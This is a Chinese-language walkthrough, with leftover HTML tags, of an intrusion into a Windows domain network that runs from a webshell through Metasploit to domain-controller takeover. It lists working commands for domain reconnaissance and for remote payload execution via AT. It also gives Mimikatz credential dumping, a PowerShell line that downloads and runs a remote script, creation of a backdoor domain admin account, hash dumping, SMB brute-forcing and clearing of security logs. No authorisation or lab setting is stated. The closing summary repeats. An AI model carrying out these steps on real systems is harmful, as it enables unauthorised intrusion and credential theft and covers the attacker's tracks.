Metasploit内网渗透实战：从Webshell到域控权限获取<\/h1>

0x01 渗透环境概述<\/h2>

已控制服务器：PAVMSEF21（内网IP：10.51.0.21）<\/li>
网络拓扑：该服务器作为连接外网和内网的关键节点，内网其他服务器无法直接连接<\/li>

初始权限：普通域用户权限<\/li> <\/ul>

0x02 反弹Meterpreter会话<\/h2>

上传免杀Payload到目标服务器<\/li>
通过Webshell（如菜刀）执行Payload<\/li>

成功反弹Meterpreter会话<\/li> <\/ol>

0x03 提权尝试<\/h2>

本地溢出提权<\/h3>

尝试模块：ms15_05和ms15_078（均失败）<\/li> <\/ul>

绕过UAC提权<\/h3>

使用bypassuac模块（失败原因分析）：

当前用户可能不在管理员组<\/li>
UAC设置不为默认值（"仅在程序试图更改我的计算机时通知我"）<\/li>

被杀毒软件拦截（创建多个文件触发检测）<\/li> <\/ul> <\/li> <\/ul>

0x04 信息收集关键命令<\/h2>

net user \/domain          # 查看域用户
<\/span><\/span>net view \/domain         # 查看有几个域
<\/span><\/span>net view \/domain:XXX     # 查看指定域内电脑
<\/span><\/span>net group \/domain        # 查询域里面的组
<\/span><\/span>net group "domain computers"<\/span> \/domain    # 查看域内所有计算机名
<\/span><\/span>net group "domain admins"<\/span> \/domain       # 查看域管理员
<\/span><\/span>net group "domain controllers"<\/span> \/domain   # 查看域控制器
<\/span><\/span>net group "enterprise admins"<\/span> \/domain    # 查看企业管理组
<\/span><\/span>net time \/domain         # 查看时间服务器（通常为域控）
<\/span><\/span><\/code><\/pre>0x05 横向移动策略<\/h2>


IPC$经典入侵方法<\/strong>：<\/p>

选择与当前机器名相似的服务器（PAVMSEP131）<\/li>
上传免杀Payload<\/li>
使用AT命令启动Payload：at \\10.51.0.131 11:11 cmd.exe \/c "C:\payload.exe"<\/code><\/li>
成功反弹PAVMSEP131服务器的Meterpreter会话<\/li>
<\/ul>
<\/li>

获取系统HASH<\/strong>：<\/p>

确认系统架构（32位\/64位）<\/li>
64位系统需将Mimikatz进程迁移到64位进程中<\/li>
使用Mimikatz抓取HASH：
load mimikatz
mimikatz_command -f sekurlsa::logonpasswords
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 PowerShell高级利用<\/h2>
执行策略绕过方法<\/h3>

本地权限绕过：
PowerShell.exe -ExecutionPolicy Bypass -File<\/span> xxx.ps1
<\/span><\/span><\/code><\/pre><\/li>
隐藏执行：
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -WindowStyle Hidden -File<\/span> xxx.ps1
<\/span><\/span><\/code><\/pre><\/li>
远程下载执行：
powershell "IEX (New-Object Net.WebClient).DownloadString('http:\/\/url\/script.ps1');Invoke-Mimikatz-DumpCreds"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
PowerView实战<\/h3>

使用Invoke-UserHunter模块查找域管理员在线服务器：
powershell.exe -exec bypass -Command "&{Import-Module .\powerview.ps1;Invoke-UserHunter}"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
发现域管理员登录在PAVMSXD30（10.51.0.30）<\/li>
<\/ul>
0x07 获取域管权限<\/h2>

入侵PAVMSXD30服务器<\/li>
使用getsystem<\/code>提权<\/li>
确认当前UID为域管理员（sonicwall）<\/li>
进程迁移到域管理员进程：
ps          # 列出进程
migrate <PID>  # 迁移到域管理员进程
<\/code><\/pre>
<\/li>
替代方法：窃取令牌（token stealing）<\/li>
<\/ol>
0x08 域控服务器攻击<\/h2>


确认域控信息：<\/p>
net time \/domain
<\/span><\/span><\/code><\/pre>
主机名：PAVMSAD64<\/li>
IP：10.51.0.63<\/li>
<\/ul>
<\/li>

添加域管理员账户：<\/p>
net user hacker P@ssw0rd \/add \/domain
<\/span><\/span>net group "domain admins"<\/span> hacker \/add
<\/span><\/span><\/code><\/pre><\/li>

验证添加成功：<\/p>
net group "domain admins"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x09 登录域控方法<\/h2>


常见方法<\/strong>：<\/p>

端口转发或SOCKS代理<\/li>
远程桌面连接<\/li>
使用psexec反弹shell<\/li>
Metasploit的psexec或smb_login模块<\/li>
<\/ul>
<\/li>

使用Metasploit的psexec<\/strong>：<\/p>

注意事项：

使用自定义免杀Payload<\/li>
需要域管理员凭据<\/li>
<\/ul>
<\/li>
成功反弹域控的Meterpreter会话<\/li>
<\/ul>
<\/li>
<\/ol>
0x10 获取域控HASH<\/h2>


常用方法<\/strong>：<\/p>

Metasploit模块：

hashdump（本地HASH）<\/li>
smart_hashdump（域HASH）<\/li>
<\/ul>
<\/li>
PowerShell模块<\/li>
WCE、Mimikatz等工具<\/li>
<\/ul>
<\/li>

使用smart_hashdump<\/strong>：<\/p>

要求：SYSTEM权限<\/li>
命令：
run post\/windows\/gather\/smart_hashdump
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
<\/ol>
0x11 内网横向扩展<\/h2>


SMB爆破内网<\/strong>：<\/p>

添加路由：
run autoroute -s 10.51.0.0\/24
<\/code><\/pre>
<\/li>
使用smb_login模块爆破<\/li>
使用psexec_scanner模块扫描<\/li>
<\/ul>
<\/li>

内网访问方法<\/strong>：<\/p>

Meterpreter端口转发<\/li>
Metasploit的socks4a模块<\/li>
第三方代理工具<\/li>
<\/ul>
<\/li>
<\/ol>
0x12 痕迹清理<\/h2>

删除添加的域管理员账户<\/li>
清除所有使用过的工具<\/li>
清理日志：

应用程序日志<\/li>
系统日志<\/li>
安全日志<\/li>
<\/ul>
<\/li>
关闭所有Meterpreter连接<\/li>
<\/ol>
关键工具总结<\/h2>


Metasploit模块<\/strong>：<\/p>

exploit\/windows\/local\/bypassuac<\/li>
post\/windows\/gather\/smart_hashdump<\/li>
auxiliary\/scanner\/smb\/smb_login<\/li>
<\/ul>
<\/li>

PowerShell脚本<\/strong>：<\/p>

PowerView.ps1<\/li>
Invoke-Mimikatz.ps1<\/li>
<\/ul>
<\/li>

经典工具<\/strong>：<\/p>

Mimikatz<\/li>
IPC$ + AT命令<\/li>
psexec<\/li>
<\/ul>
<\/li>
<\/ol>
渗透流程总结<\/h2>
Webshell → Meterpreter反弹 → 提权尝试 → 信息收集 → 横向移动 → 定位域管 → 获取域管权限 → 攻击域控 → 获取域HASH → 内网扩展 → 清理痕迹<\/p>

Metasploit内网渗透实战：从Webshell到域控权限获取<\/h1>

0x03 提权尝试<\/h2>

0x06 PowerShell高级利用<\/h2>

渗透流程总结<\/h2> Webshell → Meterpreter反弹 → 提权尝试 → 信息收集 → 横向移动 → 定位域管 → 获取域管权限 → 攻击域控 → 获取域HASH → 内网扩展 → 清理痕迹<\/p>

渗透流程总结<\/h2>
Webshell → Meterpreter反弹 → 提权尝试 → 信息收集 → 横向移动 → 定位域管 → 获取域管权限 → 攻击域控 → 获取域HASH → 内网扩展 → 清理痕迹<\/p>